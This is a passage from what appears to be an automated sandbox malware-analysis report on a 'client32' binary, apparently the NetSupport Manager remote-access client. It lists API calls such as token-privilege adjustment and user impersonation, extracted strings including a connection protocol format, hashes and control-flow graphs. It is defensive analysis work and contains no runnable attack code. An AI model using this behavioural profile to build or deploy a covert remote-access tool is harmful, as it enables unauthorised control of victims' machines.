                                                                              • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                              • String ID:
                                                                              • API String ID: 2349140579-0
                                                                              • Opcode ID: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
                                                                              • Instruction ID: 81f12928af7d2c66371a758247fa27ee71cd04b85772abc6619dfc746b0a2552
                                                                              • Opcode Fuzzy Hash: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
                                                                              • Instruction Fuzzy Hash: 4F018CB2640218ABE710DFA4CD89BABF7BCEB04705F004429E91597280D7B06904CBB0
                                                                              Function 1109D8F0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109EC30,00000244,cant create events), ref: 1109D90C
                                                                              • FindCloseChangeNotification.KERNEL32(?,00000000,1109EC30,00000244,cant create events), ref: 1109D915
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AdjustChangeCloseFindNotificationPrivilegesToken
                                                                              • String ID:
                                                                              • API String ID: 1022747518-0
                                                                              • Opcode ID: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
                                                                              • Instruction ID: 1087c1a68057020919897756081cb42e4a012b8ce4d03b8cf520615490e2fd10
                                                                              • Opcode Fuzzy Hash: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
                                                                              • Instruction Fuzzy Hash: 3CE08C30280214ABE338DE24AD90FA673EDAF05B04F11092DF8A6D2580CA60E8008B60
                                                                              Function 1102EBD0 Relevance: 252.2, APIs: 32, Strings: 111, Instructions: 1967windowthreadsleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • GetSystemMetrics.USER32(00002000), ref: 1102ED54
                                                                              • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EF15
                                                                                • Part of subcall function 11110DE0: GetCurrentThreadId.KERNEL32 ref: 11110E76
                                                                                • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                                • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
                                                                                • Part of subcall function 11110DE0: EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
                                                                                • Part of subcall function 11110DE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EF4B
                                                                              • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102EF6D
                                                                              • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102F22F
                                                                                • Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F1C
                                                                                • Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F29
                                                                                • Part of subcall function 11094F00: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F59
                                                                              • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EFCC
                                                                              • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EFD8
                                                                              • CloseHandle.KERNEL32(00000000), ref: 1102EFF0
                                                                              • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EFFD
                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102F019
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102ED86
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • IsJPIK.PCICHEK(?,?,?,View,Client,Bridge), ref: 1102F3ED
                                                                              • LoadIconA.USER32(11000000,000004C1), ref: 1102F521
                                                                              • LoadIconA.USER32(11000000,000004C2), ref: 1102F531
                                                                              • DestroyCursor.USER32(00000000), ref: 1102F557
                                                                              • DestroyCursor.USER32(00000000), ref: 1102F568
                                                                                • Part of subcall function 11028360: ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 110283A3
                                                                                • Part of subcall function 11028360: GetUserNameA.ADVAPI32(?,?), ref: 110283BC
                                                                                • Part of subcall function 11028360: RevertToSelf.ADVAPI32 ref: 110283DC
                                                                                • Part of subcall function 11028360: CloseHandle.KERNEL32(00000000), ref: 110283E3
                                                                              • GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1102FB05
                                                                              • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client), ref: 1102FB58
                                                                              • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 110300F2
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1103012C
                                                                              • DispatchMessageA.USER32(?), ref: 11030136
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 11030148
                                                                              • CloseHandle.KERNEL32(00000000,Function_000278D0,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 110303D4
                                                                              • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1103040C
                                                                              • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 11030413
                                                                              • SetWindowPos.USER32(00040414,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 11030449
                                                                              • CloseHandle.KERNEL32(00000000,1105A720,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 110304CA
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • wsprintfA.USER32 ref: 11030645
                                                                                • Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,EE49F673,?,?,00000000), ref: 1112909A
                                                                                • Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 111290A7
                                                                                • Part of subcall function 11129040: WaitForSingleObject.KERNEL32(00000006,000000FF,00000000,00000000), ref: 111290EE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Process$CloseHandleMessageWindow$CreateEvent$CriticalOpenSectionThreadwsprintf$CurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTokenUserVersionWait$ClassDispatchEnterErrorExitImpersonateLastLoggedMetricsNamePriorityRevertSelfSendSleepSystem__wcstoi64_malloc_memset
                                                                              • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$134349$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$IKS.LIC$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$Intel(r)$IsILS returned %d, isvistaservice %d$IsJPIK returned %d, isvistaservice %d$JPK$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$Unsupported Platform$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.20$V12.10.20$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                              • API String ID: 372548862-3961403152
                                                                              • Opcode ID: f030ead741776a7803f21ff1f7e048a7965167955552501523b662331764eb58
                                                                              • Instruction ID: 381c96219eccee67eae21d9e39560490d5bedbb063d23e5a2fc42920cd5923e4
                                                                              • Opcode Fuzzy Hash: f030ead741776a7803f21ff1f7e048a7965167955552501523b662331764eb58
                                                                              • Instruction Fuzzy Hash: 39F2F978E0226A9FE715CBA0CC94FADF7A5BB4870CF504468F925B72C8DB706940CB56
                                                                              Function 1102E0D0 Relevance: 82.9, APIs: 15, Strings: 32, Instructions: 630COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1185 1102e0d0-1102e120 call 111101b0 1188 1102e122-1102e136 call 11143630 1185->1188 1189 1102e138 1185->1189 1191 1102e13e-1102e183 call 11142e60 call 11143690 1188->1191 1189->1191 1197 1102e323-1102e332 call 11145990 1191->1197 1198 1102e189 1191->1198 1204 1102e338-1102e348 1197->1204 1199 1102e190-1102e193 1198->1199 1202 1102e195-1102e197 1199->1202 1203 1102e1b8-1102e1c1 1199->1203 1207 1102e1a0-1102e1b1 1202->1207 1205 1102e1c7-1102e1ce 1203->1205 1206 1102e2f4-1102e30d call 11143690 1203->1206 1208 1102e34a 1204->1208 1209 1102e34f-1102e363 call 1102d360 1204->1209 1205->1206 1210 1102e2c3-1102e2d8 call 11163ca7 1205->1210 1211 1102e1d5-1102e1d7 1205->1211 1212 1102e2da-1102e2ef call 11163ca7 1205->1212 1213 1102e26a-1102e29d call 11162777 call 11142e60 1205->1213 1214 1102e2ab-1102e2c1 call 11164ed0 1205->1214 1215 1102e25b-1102e265 1205->1215 1216 1102e29f-1102e2a9 1205->1216 1217 1102e21c-1102e222 1205->1217 1218 1102e24c-1102e256 1205->1218 1206->1199 1236 1102e313-1102e315 1206->1236 1207->1207 1219 1102e1b3 1207->1219 1208->1209 1233 1102e368-1102e36d 1209->1233 1210->1206 1211->1206 1226 1102e1dd-1102e217 call 11162777 call 11142e60 call 1102d360 1211->1226 1212->1206 1213->1206 1214->1206 1215->1206 1216->1206 1227 1102e224-1102e238 call 11163ca7 1217->1227 1228 1102e23d-1102e247 1217->1228 1218->1206 1219->1206 1226->1206 1227->1206 1228->1206 1239 1102e413-1102e42d call 11146fe0 1233->1239 1240 1102e373-1102e398 call 110b7df0 call 11147060 1233->1240 1236->1239 1243 1102e31b-1102e321 1236->1243 1254 1102e483-1102e48f call 1102bc40 1239->1254 1255 1102e42f-1102e448 call 1105e820 1239->1255 1261 1102e3a3-1102e3a9 1240->1261 1262 1102e39a-1102e3a1 1240->1262 1243->1197 1243->1204 1267 1102e491-1102e498 1254->1267 1268 1102e468-1102e46f 1254->1268 1255->1254 1266 1102e44a-1102e45c 1255->1266 1264 1102e3ab-1102e3b2 call 11028360 1261->1264 1265 1102e409 1261->1265 1262->1239 1264->1265 1283 1102e3b4-1102e3e6 1264->1283 1265->1239 1266->1254 1282 1102e45e 1266->1282 1269 1102e475-1102e478 1267->1269 1270 1102e49a-1102e4a4 1267->1270 1268->1269 1272 1102e67a-1102e69b GetComputerNameA 1268->1272 1275 1102e47a-1102e481 call 110b7df0 1269->1275 1276 1102e4a9 1269->1276 1270->1272 1277 1102e6d3-1102e6d9 1272->1277 1278 1102e69d-1102e6d1 call 11028230 1272->1278 1279 1102e4ac-1102e586 call 11027f40 call 110281e0 call 11027f40 * 2 LoadLibraryA GetProcAddress 1275->1279 1276->1279 1280 1102e6db-1102e6e0 1277->1280 1281 1102e70f-1102e722 call 11164ed0 1277->1281 1278->1277 1304 1102e727-1102e733 1278->1304 1333 1102e64a-1102e652 SetLastError 1279->1333 1334 1102e58c-1102e5a3 1279->1334 1285 1102e6e6-1102e6ea 1280->1285 1301 1102e917-1102e93a 1281->1301 1282->1268 1299 1102e3f0-1102e3ff call 110f64d0 1283->1299 1300 1102e3e8-1102e3ee 1283->1300 1290 1102e706-1102e708 1285->1290 1291 1102e6ec-1102e6ee 1285->1291 1302 1102e70b-1102e70d 1290->1302 1297 1102e702-1102e704 1291->1297 1298 1102e6f0-1102e6f6 1291->1298 1297->1302 1298->1290 1305 1102e6f8-1102e700 1298->1305 1306 1102e402-1102e404 call 1102d900 1299->1306 1300->1299 1300->1306 1318 1102e962-1102e96a 1301->1318 1319 1102e93c-1102e942 1301->1319 1302->1281 1302->1304 1313 1102e735-1102e74a call 110b7df0 call 1102a1f0 1304->1313 1314 1102e74c-1102e75f call 11081d30 1304->1314 1305->1285 1305->1297 1306->1265 1339 1102e7a3-1102e7bc call 11081d30 1313->1339 1330 1102e761-1102e784 1314->1330 1331 1102e786-1102e788 1314->1331 1322 1102e97c-1102ea08 call 11162777 * 2 call 11147060 * 2 GetCurrentProcessId call 110ee150 call 11028290 call 11147060 call 11162bb7 1318->1322 1323 1102e96c-1102e979 call 11036710 call 11162777 1318->1323 1319->1318 1321 1102e944-1102e95d call 1102d900 1319->1321 1321->1318 1323->1322 1330->1339 1332 1102e790-1102e7a1 1331->1332 1332->1332 1332->1339 1343 1102e613-1102e61f 1333->1343 1334->1343 1354 1102e5a5-1102e5ae 1334->1354 1358 1102e7c2-1102e83d call 11147060 call 110cfe80 call 110d16d0 call 110b7df0 wsprintfA call 110b7df0 wsprintfA 1339->1358 1359 1102e8fc-1102e909 call 11164ed0 1339->1359 1347 1102e662-1102e671 1343->1347 1348 1102e621-1102e62d 1343->1348 1347->1272 1355 1102e673-1102e674 FreeLibrary 1347->1355 1351 1102e63f-1102e643 1348->1351 1352 1102e62f-1102e63d GetProcAddress 1348->1352 1361 1102e654-1102e656 SetLastError 1351->1361 1362 1102e645-1102e648 1351->1362 1352->1351 1354->1343 1360 1102e5b0-1102e5e6 call 11147060 call 1112c1b0 1354->1360 1355->1272 1397 1102e853-1102e869 call 11129e00 1358->1397 1398 1102e83f-1102e84e call 11029a70 1358->1398 1375 1102e90c-1102e911 CharUpperA 1359->1375 1360->1343 1382 1102e5e8-1102e60e call 11147060 call 11027f80 1360->1382 1363 1102e65c 1361->1363 1362->1363 1363->1347 1375->1301 1382->1343 1402 1102e882-1102e8bc call 110d0e20 * 2 1397->1402 1403 1102e86b-1102e87d call 110d0e20 1397->1403 1398->1397 1410 1102e8d2-1102e8fa call 11164ed0 call 110d0a10 1402->1410 1411 1102e8be-1102e8cd call 11029a70 1402->1411 1403->1402 1410->1375 1411->1410
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _malloc_memsetwsprintf
                                                                              • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$134349$18/11/16 11:28:14 V12.10F20$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                              • API String ID: 3802068140-874603751
                                                                              • Opcode ID: 5b056e33e84810f5b47047bfdd2e7b6d2b60f2191365f8a3aba671e699e49f35
                                                                              • Instruction ID: ec88a390f79512b50aba7168cc31da78705c53b3cca2911266f0d70c00f4e6f9
                                                                              • Opcode Fuzzy Hash: 5b056e33e84810f5b47047bfdd2e7b6d2b60f2191365f8a3aba671e699e49f35
                                                                              • Instruction Fuzzy Hash: 8232B175D4127A9FDB22CF90CC84BEDB7B8BB44308F8445E9E559A7280EB706E84CB51
                                                                              Function 6EF03D00 Relevance: 68.6, APIs: 11, Strings: 28, Instructions: 392COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1837 6ef03d00-6ef03d42 call 6ef11c50 call 6ef03b80 1841 6ef03d47-6ef03d4f 1837->1841 1842 6ef03d51-6ef03d6b call 6ef128e1 1841->1842 1843 6ef03d6c-6ef03d6e 1841->1843 1845 6ef03d70-6ef03d84 call 6eef6f50 1843->1845 1846 6ef03d87-6ef03da1 call 6eef8fb0 1843->1846 1845->1846 1852 6ef03da3-6ef03dc4 call 6eef63c0 call 6ef128e1 1846->1852 1853 6ef03dc5-6ef03e44 call 6eef5e90 * 2 call 6ef07be0 call 6eef5e20 lstrlenA 1846->1853 1866 6ef03e46-6ef03e95 call 6ef0d8b0 call 6eef5060 call 6eef4830 call 6ef11bfd 1853->1866 1867 6ef03e98-6ef03fbe call 6eef5500 call 6eef6050 call 6ef07c70 * 2 call 6ef07d00 * 3 call 6eef5060 call 6ef07d00 call 6ef11bfd call 6ef07d00 gethostname call 6ef07d00 call 6eefb8e0 1853->1867 1866->1867 1902 6ef03fc0 1867->1902 1903 6ef03fc5-6ef03fe1 call 6ef07d00 1867->1903 1902->1903 1906 6ef03fe3-6ef03ff5 call 6ef07d00 1903->1906 1907 6ef03ff8-6ef03ffe 1903->1907 1906->1907 1909 6ef04004-6ef04022 call 6eef5e20 1907->1909 1910 6ef0421a-6ef04263 call 6ef07b60 call 6ef11bfd call 6eef98d0 call 6ef077e0 1907->1910 1916 6ef04024-6ef04057 call 6eef5060 call 6ef07d00 call 6ef11bfd 1909->1916 1917 6ef0405a-6ef04084 call 6eef5e20 1909->1917 1937 6ef04292-6ef042aa call 6ef128e1 1910->1937 1938 6ef04265-6ef04291 call 6eefa4e0 call 6ef128e1 1910->1938 1916->1917 1925 6ef041d1-6ef04217 call 6ef07d00 call 6eef5e20 call 6ef07d00 1917->1925 1926 6ef0408a-6ef041ce call 6eef5060 call 6ef07d00 call 6ef11bfd call 6eef5e20 call 6eef5060 call 6ef07d00 call 6ef11bfd call 6eef5e20 call 6eef5060 call 6ef07d00 call 6ef11bfd call 6eef5e20 call 6eef5060 call 6ef07d00 call 6ef11bfd 1917->1926 1925->1910 1926->1925
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              • Associated: 00000004.00000002.3404460740.000000006EEF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404538676.000000006EF39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404604288.000000006EF40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memset
                                                                              • String ID: *Dept$*Gsk$1.1$134349$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
                                                                              • API String ID: 2102423945-3643025512
                                                                              • Opcode ID: f6fb939376c844ec4e61a136d366a489b694b3738c37b5fe093fcce4940d3eac
                                                                              • Instruction ID: 628378ff25797e51b586e87050a66e66fdb4f516d9b6b44ea1901e091dee8be5
                                                                              • Opcode Fuzzy Hash: f6fb939376c844ec4e61a136d366a489b694b3738c37b5fe093fcce4940d3eac
                                                                              • Instruction Fuzzy Hash: 17E1617290052CABDB24DBE4CCA0FEEB77C9F55205F1048DAE50967241DB316B899FE1
                                                                              Function 11144140 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1978 11144140-11144181 GetModuleFileNameA 1979 111441c3 1978->1979 1980 11144183-11144196 call 11081e00 1978->1980 1982 111441c9-111441cd 1979->1982 1980->1979 1989 11144198-111441c1 LoadLibraryA 1980->1989 1983 111441cf-111441dc LoadLibraryA 1982->1983 1984 111441e9-11144207 GetModuleHandleA GetProcAddress 1982->1984 1983->1984 1986 111441de-111441e6 LoadLibraryA 1983->1986 1987 11144217-11144240 GetProcAddress * 4 1984->1987 1988 11144209-11144215 1984->1988 1986->1984 1990 11144243-111442bb GetProcAddress * 10 call 11162bb7 1987->1990 1988->1990 1989->1982 1992 111442c0-111442c3 1990->1992
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,759223A0), ref: 11144173
                                                                              • LoadLibraryA.KERNEL32(?), ref: 111441BC
                                                                              • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 111441D5
                                                                              • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 111441E4
                                                                              • GetModuleHandleA.KERNEL32(?), ref: 111441EA
